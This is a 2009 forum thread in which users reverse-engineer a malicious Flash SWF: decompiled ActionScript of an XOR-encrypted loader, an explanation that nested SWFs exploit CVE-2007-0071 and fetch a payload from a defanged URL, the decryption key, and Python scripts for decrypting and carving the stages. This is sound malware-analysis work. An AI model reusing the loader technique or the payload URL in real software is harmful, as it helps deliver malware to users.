swf exploit


BATMAN
November 4th, 2009, 16:31
I used Sothink SWF Decompiler and I've got this
Code:

    package
    {
        import flash.display.*;
        import flash.events.*;
        import flash.utils.*;
        import fromFactLooks.*;

        public class fromFactLooks extends Sprite
        {

            public function fromFactLooks()
            {
                var readerTypeNot:Loader;
                // sArr holds the XOR-encrypted second-stage SWF, one byte per entry
                var sArr:* = new Array();
                sArr[0] = "0x72";
                sArr[1] = "0x63";
                sArr[2] = "0x64";
                sArr[3] = "0x3e";
                sArr[4] = "0xc1";
                sArr[5] = "0xf7";
                sArr[6] = "0x64";
                sArr[7] = "0x62";
                sArr[8] = "0x48";
                sArr[9] = "0xed";
                sArr[10] = "0xdc";
                sArr[11] = "0x49";
                sArr[12] = "0x3e";
                sArr[13] = "0x4b";
                sArr[14] = "0x2f";
                sArr[15] = "0xef";
                sArr[16] = "0x47";
                sArr[17] = "0xd2";


                .........................................


                var itsPieceNot:* = new ByteArray();    // receives the decrypted bytes
                var oneNormalThe:Number;               // index into the XOR key (initializer not recovered by the decompiler)
                var alsoThePiece:String;                // the XOR key (value not recovered by the decompiler)
                var i:Number;
                while (i < sArr.length)
                {
                    var _loc_2:* = alsoThePiece;
                    oneNormalThe++;                      // decompiler printed "oneNormalThe = oneNormalThe++", which would never advance
                    // decrypt one byte: ciphertext XOR one character of the key
                    itsPieceNot[i] = sArr[i] ^ _loc_2.charCodeAt(oneNormalThe);
                    if (oneNormalThe >= alsoThePiece.length)
                    {
                        oneNormalThe;                    // statement body not recovered by the decompiler; the key index wraps here
                    }
                    i++;                                 // decompiler printed "i = i++", which would loop forever
                }
                readerTypeNot = new Loader();
                addChild(readerTypeNot);
                try
                {
                    // call upUseEver once the decrypted SWF has finished loading
                    readerTypeNot.loaderInfo.addEventListener(Event.COMPLETE, function (event:Event) : void
                    {
                        upUseEver(event, readerTypeNot);
                        return;
                    }// end function
                    );
                    // load the decrypted bytes as a nested SWF (the second stage)
                    readerTypeNot.loadBytes(itsPieceNot);
                }
                catch (e:Error)
                {
                    trace(e);
                }
                return;
            }// end function

            // the second parameter's name was replaced by a file path in the decompiler output; "loader" is assumed here
            private function upUseEver(event:Event, loader:Loader) : void
            {
                trace(event);
                return;
            }// end function

        }
    }


How can I get the malicious URL? What should I do next?

Can anybody help with this?

binjo
November 4th, 2009, 22:23
Hi,

This AS script basically does the following:

1. Loop-decrypt the array "sArr" with its key "alsoThePiece".
2. Load the decrypted bytes with "loadBytes"; they are another compressed SWF file.
3. The loaded SWF "drops & loadBytes" 12 other SWF files, which leverage the vulnerability CVE-2007-0071.
4. Download and execute the payload, the typical activity of a malicious SWF.
The URL is: hxxp://zyejanag.cn/rf/update.php?id=3, though the host is not found.

I've attached all the decrypted samples and the tools I used, in case you want to do it yourself. Password is: y0

Cheers

BATMAN
November 5th, 2009, 06:42
Ohh, thanks!! Can you write more about how you got the URL? =\

binjo
November 5th, 2009, 22:42
Try loading the attached 0x0.idb into IDA, and you will find it out yourself. ;-p

h4h4h4h4
December 4th, 2009, 17:50
Thanks for your insight, binjo. I learned a lot from your post, and thanks for sharing your Python scripts.

One question, though: how did you find the key value for "alsoThePiece"?

In the dec_fromFactLooks.py script it has:

alsoThePiece = "147702db07145348245dc5a2f2fe5683"

How did you calculate/find that?

Also, the other script, extract_swf_byte.py, doesn't seem to do anything. I tried piping its output to a file and running it with the fromFactLooks.swf file, and nothing happens.

I loaded the .idb file in IDA and saw the download URL, thanks for sharing that. I'm just wondering how you got to that point.

Sorry this is 2 months late; I just saw the post now.
Thanks,

h4h4h4h4
December 4th, 2009, 19:21
I think I found the code where it stores the key.

Code:

    var itsPieceNot:* = new ByteArray();    // receives the decrypted bytes
    var oneNormalThe:Number;               // index into the XOR key
    var alsoThePiece:String;                // the XOR key
    var i:Number;
    while (i < sArr.length)
    {
        var _loc_2:* = alsoThePiece;
        oneNormalThe = (oneNormalThe + 1);
        // decrypt one byte: ciphertext XOR one character of the key
        itsPieceNot[i] = sArr[i] ^ _loc_2.charCodeAt(oneNormalThe);
        if (oneNormalThe >= alsoThePiece.length)
        {
            oneNormalThe;                    // statement body not recovered by the decompiler; the key index wraps here
        }
        i = (i + 1);
    }

It looks like it takes array sArr[i] and does a bitwise XOR with alsoThePiece and uses a Unicode/ASCII "charCodeAt" formula, but I'm lost as to the logic of what it's trying to do and how it is performing the XOR/decoding process.
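The XOR loop quoted above, worked through in Python as an added example (this is not binjo's dec_fromFactLooks.py and not code from the sample). The inputs are the 18 sArr entries shown in the decompiler output and the key value quoted from dec_fromFactLooks.py earlier in the thread. One assumption is made: that ciphertext byte i is XORed with key[i % len(key)], which is the net effect of the decompiled loop (advance the key index, wrap when it reaches the key's length). The decrypted bytes are then parsed as an SWF header, which is the quickest check that the key and index scheme are right.

```python
"""Decrypt the "sArr" table from the decompiled fromFactLooks.swf (added example).

Not binjo's dec_fromFactLooks.py. Inputs: the 18 sArr entries shown in the
decompiler output in this thread, and the key value quoted from
dec_fromFactLooks.py. Assumption: ciphertext byte i is XORed with
key[i % len(key)], the net effect of the decompiled loop (advance the key
index, wrap at the key's length).
"""
import re
import struct

# Key value quoted from dec_fromFactLooks.py in the thread.
KEY = b"147702db07145348245dc5a2f2fe5683"

# The sArr assignments exactly as they appear in the decompiler output
# (only the first 18 entries of the table are shown on the page).
DECOMPILED_SARR = """
sArr[0] = "0x72";
sArr[1] = "0x63";
sArr[2] = "0x64";
sArr[3] = "0x3e";
sArr[4] = "0xc1";
sArr[5] = "0xf7";
sArr[6] = "0x64";
sArr[7] = "0x62";
sArr[8] = "0x48";
sArr[9] = "0xed";
sArr[10] = "0xdc";
sArr[11] = "0x49";
sArr[12] = "0x3e";
sArr[13] = "0x4b";
sArr[14] = "0x2f";
sArr[15] = "0xef";
sArr[16] = "0x47";
sArr[17] = "0xd2";
"""

_ASSIGN = re.compile(r'sArr\[(\d+)\]\s*=\s*"0x([0-9a-fA-F]{2})"')


def parse_sarr(actionscript: str) -> bytes:
    """Collect the sArr[n] = "0xNN" assignments from decompiler output, in index order."""
    entries = {int(n): int(v, 16) for n, v in _ASSIGN.findall(actionscript)}
    if sorted(entries) != list(range(len(entries))):
        raise ValueError("sArr indices are not contiguous; the listing is incomplete")
    return bytes(entries[i] for i in range(len(entries)))


def xor_decrypt(data: bytes, key: bytes) -> bytes:
    """Repeating-key XOR; the same call encrypts and decrypts."""
    return bytes(b ^ key[i % len(key)] for i, b in enumerate(data))


def parse_swf_header(data: bytes) -> dict:
    """Read the 8-byte SWF header and, for CWS, sanity-check the zlib stream behind it."""
    if len(data) < 8 or data[:3] not in (b"FWS", b"CWS"):
        raise ValueError("not an SWF header: %r" % data[:3])
    compressed = data[:3] == b"CWS"
    # A zlib header's CMF/FLG bytes satisfy (CMF*256 + FLG) % 31 == 0 (RFC 1950).
    zlib_ok = compressed and len(data) >= 10 and ((data[8] << 8) | data[9]) % 31 == 0
    return {
        "signature": data[:3].decode("ascii"),
        "version": data[3],
        "length": struct.unpack("<I", data[4:8])[0],   # uncompressed file length, little-endian
        "compressed": compressed,
        "zlib_header_valid": zlib_ok,
    }


def decrypt_stage2_header():
    """Decrypt the bytes shown on the page and parse them as the header of stage 2."""
    plain = xor_decrypt(parse_sarr(DECOMPILED_SARR), KEY)
    return plain, parse_swf_header(plain)


if __name__ == "__main__":
    plain, header = decrypt_stage2_header()
    print(plain.hex())
    print(header)
```

The 18 bytes decrypt to a "CWS" signature, version 9, a declared uncompressed length of 50673 bytes and the 0x78 0xda start of a zlib stream, which matches binjo's description of the second stage as a compressed SWF. With the full sArr table the same call yields the whole file, and zlib.decompress(plain[8:]) inflates it; if the key or the index offset were wrong, no FWS/CWS signature would appear at offset 0.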

binjo
December 7th, 2009, 01:37
Hi, h4h4h4h4

About the magic word "alsoThePiece": yes, you're right, it iterates and XORs each item of sArr with an item of alsoThePiece.
My script, extract_swf_byte.py, tries to find "465753" in the decrypted SWF file and packs according to the length. "465753" is the hex of "FWS", the header of the SWF format, though it's plain text. That's how the 3rd-layer encryption is deployed.
For how to use it, try this in your cmd/shell: python extract_swf_byte.py dec_fromFactLooks.swf x0.swf_; it will generate 0x0.swf_, 1x0.swf_ and so on.

Bye.
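binjo's description of extract_swf_byte.py, as an added example in Python (this is not his script). It follows the steps he gives: find the text "465753" (the hex spelling of "FWS"), decode the hex SWF header behind it and cut out exactly as many hex digits as the header's length field declares. The container it scans is constructed for this demo, not taken from the sample, and the file names follow his "x0.swf_" suffix convention. The CWS/FWS conversion is added because the second stage is a compressed SWF; the thread itself does not describe that step.

```python
"""Carve hex-text SWFs out of a decrypted stage, and inflate CWS to FWS (added example).

Not binjo's extract_swf_byte.py, but it follows his description: find the text
"465753" (hex of "FWS"), decode the hex SWF header behind it and cut out exactly
as many hex digits as the header's length field says. The container below is
constructed for this demo, not taken from the sample. The CWS <-> FWS helpers
are added because stage 2 is a compressed SWF; the thread does not describe them.
"""
import binascii
import struct
import zlib

FWS_HEX = b"465753"   # "FWS" written out as hex text, the marker binjo searched for


def build_fws(version: int, body: bytes) -> bytes:
    """Minimal uncompressed SWF: 'FWS', version byte, total length (LE uint32), body."""
    return b"FWS" + bytes([version]) + struct.pack("<I", 8 + len(body)) + body


def compress_to_cws(fws: bytes) -> bytes:
    """FWS -> CWS: same header with a 'C', zlib stream for everything after byte 8."""
    if fws[:3] != b"FWS":
        raise ValueError("not an FWS file")
    return b"CWS" + fws[3:8] + zlib.compress(fws[8:])


def inflate_cws(data: bytes) -> bytes:
    """CWS -> FWS, checking the inflated size against the header's length field."""
    if data[:3] != b"CWS":
        raise ValueError("not a CWS file")
    declared = struct.unpack("<I", data[4:8])[0]
    body = zlib.decompress(data[8:])
    if 8 + len(body) != declared:
        raise ValueError("inflated to %d bytes, header says %d" % (8 + len(body), declared))
    return b"FWS" + data[3:8] + body


def carve_hex_fws(blob: bytes):
    """Return [(offset, swf_bytes)] for every hex-text FWS found in blob.

    For an FWS the length field is the whole file size, so the embedded file is
    exactly 2*length hex digits starting at the signature. Hits whose header does
    not decode, or whose hex run is shorter than declared, are skipped.
    """
    found, pos = [], 0
    while (start := blob.find(FWS_HEX, pos)) != -1:
        try:
            header = binascii.unhexlify(blob[start:start + 16])      # 8 header bytes
            length = struct.unpack("<I", header[4:8])[0]
            swf = binascii.unhexlify(blob[start:start + 2 * length])
        except (binascii.Error, struct.error):
            swf, length = b"", 0
        if length >= 8 and len(swf) == length:
            found.append((start, swf))
            pos = start + 2 * length          # continue after this file
        else:
            pos = start + 1                   # false positive or truncated run
    return found


def constructed_container() -> bytes:
    """Constructed stand-in for a decrypted stage: two hex-text FWS files and a decoy."""
    swf_a = build_fws(9, bytes(range(16)))
    swf_b = build_fws(8, b"B" * 40)
    return (b'var a:String = "' + binascii.hexlify(swf_a) + b'";\n'
            b'var decoy:String = "4657530000";\n'      # signature with no sane file behind it
            b'var b:String = "' + binascii.hexlify(swf_b) + b'";\n')


if __name__ == "__main__":
    # Same naming as binjo's "x0.swf_" suffix: 0x0.swf_, 1x0.swf_, ...
    for n, (offset, swf) in enumerate(carve_hex_fws(constructed_container())):
        name = "%dx0.swf_" % n
        with open(name, "wb") as fh:
            fh.write(swf)
        print(name, "offset", offset, "length", len(swf))
```

Only FWS files can be cut by the length field: a CWS header carries the uncompressed length, so a hex-encoded CWS would have to be taken as the whole run of hex digits and handed to zlib.decompressobj, whose unused_data tells you where the stream actually ended.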